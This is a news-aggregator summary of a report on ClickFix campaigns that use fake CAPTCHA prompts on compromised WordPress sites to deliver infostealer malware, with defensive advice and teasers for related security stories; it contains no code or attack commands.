CP
cyberpings
Malware & RansomwareHIGH

Malware - ClickFix Techniques Evolve in Infostealer Campaigns

CSCSO Online
ClickFixVidar StealerDoubleDonut LoaderWordPressMicrosoft
🎯

Basically, hackers are using tricky methods to steal information from websites.

Quick Summary

A surge in ClickFix techniques is leading to infostealer malware attacks across 250 WordPress sites. This growing threat affects visitors globally, emphasizing the need for vigilance and security measures.

What Happened

Cybercriminals are stepping up their game with ClickFix techniques to deliver new infostealer malware. One campaign has compromised over 250 WordPress sites across 12 countries. This operation uses sophisticated social engineering lures, such as fake Cloudflare CAPTCHA challenges, to trick users into executing malicious code. The campaign has been active since December 2025 and is part of a larger trend of increasing cyber threats.

The attackers have employed a method that allows them to deliver stealthy in-memory payloads. A separate attack detected by Microsoft targets the Windows Terminal for executing payloads instead of the traditional Run dialog. This evolution in tactics indicates a high level of automation and organization among the threat actors.

Who's Being Targeted

The compromised WordPress sites include a mix of regional news outlets, local businesses, and even a U.S. Senate candidate's official webpage. This broad targeting suggests that the attackers are not just focusing on specific sectors but are casting a wide net to maximize their impact. The use of fake CAPTCHA challenges is designed to lure unsuspecting visitors into executing harmful commands, making it crucial for website operators to be vigilant.

Signs of Infection

The ClickFix campaign delivers multiple infostealer payloads, including two previously unknown variants. One notable payload is the DoubleDonut Loader, which injects code into legitimate Windows processes. This technique makes detection difficult, as the malware operates almost entirely in memory. Users might notice unusual browser behavior or unexpected prompts for commands, which could indicate infection.

How to Protect Yourself

To safeguard against these evolving threats, website operators should ensure their admin login panels are not publicly exposed. Rapid7 has noted that most compromised sites had accessible admin pages, making them easy targets. Regularly updating WordPress and its plugins, along with implementing strong password policies, can help mitigate risks. Additionally, users should be cautious about executing commands prompted by websites, especially those that seem suspicious or unusual.

As the landscape of cyber threats continues to evolve, staying informed and proactive is key to maintaining security.

🔒 Pro insight: The evolution of ClickFix tactics indicates a shift towards more sophisticated social engineering methods, making traditional defenses less effective.

Original article from

CSO Online

Read Full Article

Share

Related Pings

HIGHMalware & Ransomware

Malware - ClickFix Campaigns Distribute MacSync Infostealer

Three ClickFix campaigns are spreading the MacSync infostealer through fake AI tool installers. Targeting macOS users, these campaigns exploit social engineering tactics to steal sensitive data. Stay vigilant and protect your devices from these evolving threats.

The Hacker News·
HIGHMalware & Ransomware

GlassWorm Malware - New Phase of Supply-Chain Attack

Hackers are hijacking Open VSX extensions to spread GlassWorm malware through dependency abuse. Developers are at risk from seemingly innocent tools that install malicious payloads. It's crucial to monitor and audit your extensions to stay safe from this evolving threat.

CSO Online·
HIGHMalware & Ransomware

Malware - ForceMemo Compromises Python Repositories on GitHub

In a troubling development, hundreds of GitHub accounts have been compromised due to the ForceMemo campaign. This attack injects malware into Python repositories, risking sensitive data theft. Developers are urged to strengthen their security measures to prevent further breaches.

SecurityWeek·
HIGHMalware & Ransomware

Warlock Ransomware - Dissecting New Attack Techniques

Warlock ransomware has upgraded its attack strategies, targeting tech and government sectors. Their new tactics enhance persistence and evasion, posing significant risks to data security.

Trend Micro Research·
HIGHMalware & Ransomware

GoPix - Advanced Banking Trojan Exploits Memory Techniques

GoPix is a new banking Trojan targeting Brazilian users, using advanced memory techniques to steal sensitive data. It exploits trust in popular services to spread. Users must stay vigilant against these sophisticated attacks to protect their finances.

Kaspersky Securelist·
HIGHMalware & Ransomware

Steam Malware - FBI Seeks Help to Track Campaign Victims

The FBI is investigating a malware campaign on Steam. Gamers are urged to report any infections. This effort aims to identify the threat actor and protect users from further harm.

Infosecurity Magazine·